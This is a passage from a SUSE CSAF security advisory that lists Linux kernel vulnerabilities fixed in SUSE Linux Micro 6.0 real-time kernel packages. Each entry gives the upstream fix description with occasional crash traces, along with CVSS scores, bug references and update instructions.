[inline]\n _raw_spin_lock_irqsave+0xa7/0xf0 kernel/locking/spinlock.c:162\n rtlock_slowlock kernel/locking/rtmutex.c:1894 [inline]\n rwbase_rtmutex_lock_state kernel/locking/spinlock_rt.c:160 [inline]\n rwbase_write_lock+0xd3/0x7e0 kernel/locking/rwbase_rt.c:244\n rt_write_lock+0x76/0x110 kernel/locking/spinlock_rt.c:243\n write_lock_bh include/linux/rwlock_rt.h:99 [inline]\n tipc_mon_reinit_self+0x79/0x430 net/tipc/monitor.c:718\n tipc_net_finalize+0x115/0x190 net/tipc/net.c:140\n process_one_work kernel/workqueue.c:3236 [inline]\n process_scheduled_works+0xade/0x17b0 kernel/workqueue.c:3319\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3400\n kthread+0x70e/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x439/0x7d0 arch/x86/kernel/process.c:148\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nAllocated by task 6089:\n kasan_save_stack mm/kasan/common.c:47 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:68\n poison_kmalloc_redzone mm/kasan/common.c:388 [inline]\n __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:405\n kasan_kmalloc include/linux/kasan.h:260 [inline]\n __kmalloc_cache_noprof+0x1a8/0x320 mm/slub.c:4407\n kmalloc_noprof include/linux/slab.h:905 [inline]\n kzalloc_noprof include/linux/slab.h:1039 [inline]\n tipc_mon_create+0xc3/0x4d0 net/tipc/monitor.c:657\n tipc_enable_bearer net/tipc/bearer.c:357 [inline]\n __tipc_nl_bearer_enable+0xe16/0x13f0 net/tipc/bearer.c:1047\n __tipc_nl_compat_doit net/tipc/netlink_compat.c:371 [inline]\n tipc_nl_compat_doit+0x3bc/0x5f0 net/tipc/netlink_compat.c:393\n tipc_nl_compat_handle net/tipc/netlink_compat.c:-1 [inline]\n tipc_nl_compat_recv+0x83c/0xbe0 net/tipc/netlink_compat.c:1321\n genl_family_rcv_msg_doit+0x215/0x300 net/netlink/genetlink.c:1115\n genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline]\n genl_rcv_msg+0x60e/0x790 net/netlink/genetlink.c:1210\n netlink_rcv_skb+0x208/0x470 net/netlink/af_netlink.c:2552\n genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0x846/0xa10 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x805/0xb30 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:714 [inline]\n __sock_sendmsg+0x21c/0x270 net/socket.c:729\n ____sys_sendmsg+0x508/0x820 net/socket.c:2614\n ___sys_sendmsg+0x21f/0x2a0 net/socket.c:2668\n __sys_sendmsg net/socket.c:2700 [inline]\n __do_sys_sendmsg net/socket.c:2705 [inline]\n __se_sys_sendmsg net/socket.c:2703 [inline]\n __x64_sys_sendmsg+0x1a1/0x260 net/socket.c:2703\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0x3b0 arch/\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40280",
"url": "https://www.suse.com/security/cve/CVE-2025-40280"
},
{
"category": "external",
"summary": "SUSE Bug 1254847 for CVE-2025-40280",
"url": "https://bugzilla.suse.com/1254847"
},
{
"category": "external",
"summary": "SUSE Bug 1254951 for CVE-2025-40280",
"url": "https://bugzilla.suse.com/1254951"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-40280"
},
{
"cve": "CVE-2025-40282",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40282"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: 6lowpan: reset link-local header on ipv6 recv path\n\nBluetooth 6lowpan.c netdev has header_ops, so it must set link-local\nheader for RX skb, otherwise things crash, eg. with AF_PACKET SOCK_RAW\n\nAdd missing skb_reset_mac_header() for uncompressed ipv6 RX path.\n\nFor the compressed one, it is done in lowpan_header_decompress().\n\nLog: (BlueZ 6lowpan-tester Client Recv Raw - Success)\n------\nkernel BUG at net/core/skbuff.c:212!\nCall Trace:\n\u003cIRQ\u003e\n...\npacket_rcv (net/packet/af_packet.c:2152)\n...\n\u003cTASK\u003e\n__local_bh_enable_ip (kernel/softirq.c:407)\nnetif_rx (net/core/dev.c:5648)\nchan_recv_cb (net/bluetooth/6lowpan.c:294 net/bluetooth/6lowpan.c:359)\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40282",
"url": "https://www.suse.com/security/cve/CVE-2025-40282"
},
{
"category": "external",
"summary": "SUSE Bug 1254850 for CVE-2025-40282",
"url": "https://bugzilla.suse.com/1254850"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40282"
},
{
"cve": "CVE-2025-40283",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40283"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: btusb: reorder cleanup in btusb_disconnect to avoid UAF\n\nThere is a KASAN: slab-use-after-free read in btusb_disconnect().\nCalling \"usb_driver_release_interface(\u0026btusb_driver, data-\u003eintf)\" will\nfree the btusb data associated with the interface. The same data is\nthen used later in the function, hence the UAF.\n\nFix by moving the accesses to btusb data to before the data is free\u0027d.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40283",
"url": "https://www.suse.com/security/cve/CVE-2025-40283"
},
{
"category": "external",
"summary": "SUSE Bug 1254858 for CVE-2025-40283",
"url": "https://bugzilla.suse.com/1254858"
},
{
"category": "external",
"summary": "SUSE Bug 1254859 for CVE-2025-40283",
"url": "https://bugzilla.suse.com/1254859"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40283"
},
{
"cve": "CVE-2025-40284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: cancel mesh send timer when hdev removed\n\nmesh_send_done timer is not canceled when hdev is removed, which causes\ncrash if the timer triggers after hdev is gone.\n\nCancel the timer when MGMT removes the hdev, like other MGMT timers.\n\nShould fix the BUG: sporadically seen by BlueZ test bot\n(in \"Mesh - Send cancel - 1\" test).\n\nLog:\n------\nBUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0\n...\nFreed by task 36:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3a/0x60\n __kasan_slab_free+0x43/0x70\n kfree+0x103/0x500\n device_release+0x9a/0x210\n kobject_put+0x100/0x1e0\n vhci_release+0x18b/0x240\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40284",
"url": "https://www.suse.com/security/cve/CVE-2025-40284"
},
{
"category": "external",
"summary": "SUSE Bug 1254860 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "external",
"summary": "SUSE Bug 1257669 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1257669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-40284"
},
{
"cve": "CVE-2025-40287",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40287"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nexfat: fix improper check of dentry.stream.valid_size\n\nWe found an infinite loop bug in the exFAT file system that can lead to a\nDenial-of-Service (DoS) condition. When a dentry in an exFAT filesystem is\nmalformed, the following system calls - SYS_openat, SYS_ftruncate, and\nSYS_pwrite64 - can cause the kernel to hang.\n\nRoot cause analysis shows that the size validation code in exfat_find()\ndoes not check whether dentry.stream.valid_size is negative. As a result,\nthe system calls mentioned above can succeed and eventually trigger the DoS\nissue.\n\nThis patch adds a check for negative dentry.stream.valid_size to prevent\nthis vulnerability.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40287",
"url": "https://www.suse.com/security/cve/CVE-2025-40287"
},
{
"category": "external",
"summary": "SUSE Bug 1255030 for CVE-2025-40287",
"url": "https://bugzilla.suse.com/1255030"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40287"
},
{
"cve": "CVE-2025-40288",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40288"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: Fix NULL pointer dereference in VRAM logic for APU devices\n\nPreviously, APU platforms (and other scenarios with uninitialized VRAM managers)\ntriggered a NULL pointer dereference in `ttm_resource_manager_usage()`. The root\ncause is not that the `struct ttm_resource_manager *man` pointer itself is NULL,\nbut that `man-\u003ebdev` (the backing device pointer within the manager) remains\nuninitialized (NULL) on APUs-since APUs lack dedicated VRAM and do not fully\nset up VRAM manager structures. When `ttm_resource_manager_usage()` attempts to\nacquire `man-\u003ebdev-\u003elru_lock`, it dereferences the NULL `man-\u003ebdev`, leading to\na kernel OOPS.\n\n1. **amdgpu_cs.c**: Extend the existing bandwidth control check in\n `amdgpu_cs_get_threshold_for_moves()` to include a check for\n `ttm_resource_manager_used()`. If the manager is not used (uninitialized\n `bdev`), return 0 for migration thresholds immediately-skipping VRAM-specific\n logic that would trigger the NULL dereference.\n\n2. **amdgpu_kms.c**: Update the `AMDGPU_INFO_VRAM_USAGE` ioctl and memory info\n reporting to use a conditional: if the manager is used, return the real VRAM\n usage; otherwise, return 0. This avoids accessing `man-\u003ebdev` when it is\n NULL.\n\n3. **amdgpu_virt.c**: Modify the vf2pf (virtual function to physical function)\n data write path. Use `ttm_resource_manager_used()` to check validity: if the\n manager is usable, calculate `fb_usage` from VRAM usage; otherwise, set\n `fb_usage` to 0 (APUs have no discrete framebuffer to report).\n\nThis approach is more robust than APU-specific checks because it:\n- Works for all scenarios where the VRAM manager is uninitialized (not just APUs),\n- Aligns with TTM\u0027s design by using its native helper function,\n- Preserves correct behavior for discrete GPUs (which have fully initialized\n `man-\u003ebdev` and pass the `ttm_resource_manager_used()` check).\n\nv4: use ttm_resource_manager_used(\u0026adev-\u003emman.vram_mgr.manager) instead of checking the adev-\u003egmc.is_app_apu flag (Christian)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40288",
"url": "https://www.suse.com/security/cve/CVE-2025-40288"
},
{
"category": "external",
"summary": "SUSE Bug 1255057 for CVE-2025-40288",
"url": "https://bugzilla.suse.com/1255057"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40288"
},
{
"cve": "CVE-2025-40289",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40289"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: hide VRAM sysfs attributes on GPUs without VRAM\n\nOtherwise accessing them can cause a crash.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40289",
"url": "https://www.suse.com/security/cve/CVE-2025-40289"
},
{
"category": "external",
"summary": "SUSE Bug 1255042 for CVE-2025-40289",
"url": "https://bugzilla.suse.com/1255042"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40289"
},
{
"cve": "CVE-2025-40292",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40292"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio-net: fix received length check in big packets\n\nSince commit 4959aebba8c0 (\"virtio-net: use mtu size as buffer length\nfor big packets\"), when guest gso is off, the allocated size for big\npackets is not MAX_SKB_FRAGS * PAGE_SIZE anymore but depends on\nnegotiated MTU. The number of allocated frags for big packets is stored\nin vi-\u003ebig_packets_num_skbfrags.\n\nBecause the host announced buffer length can be malicious (e.g. the host\nvhost_net driver\u0027s get_rx_bufs is modified to announce incorrect\nlength), we need a check in virtio_net receive path. Currently, the\ncheck is not adapted to the new change which can lead to NULL page\npointer dereference in the below while loop when receiving length that\nis larger than the allocated one.\n\nThis commit fixes the received length check corresponding to the new\nchange.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40292",
"url": "https://www.suse.com/security/cve/CVE-2025-40292"
},
{
"category": "external",
"summary": "SUSE Bug 1255175 for CVE-2025-40292",
"url": "https://bugzilla.suse.com/1255175"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40292"
},
{
"cve": "CVE-2025-40293",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40293"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommufd: Don\u0027t overflow during division for dirty tracking\n\nIf pgshift is 63 then BITS_PER_TYPE(*bitmap-\u003ebitmap) * pgsize will overflow\nto 0 and this triggers divide by 0.\n\nIn this case the index should just be 0, so reorganize things to divide\nby shift and avoid hitting any overflows.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40293",
"url": "https://www.suse.com/security/cve/CVE-2025-40293"
},
{
"category": "external",
"summary": "SUSE Bug 1255179 for CVE-2025-40293",
"url": "https://bugzilla.suse.com/1255179"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40293"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
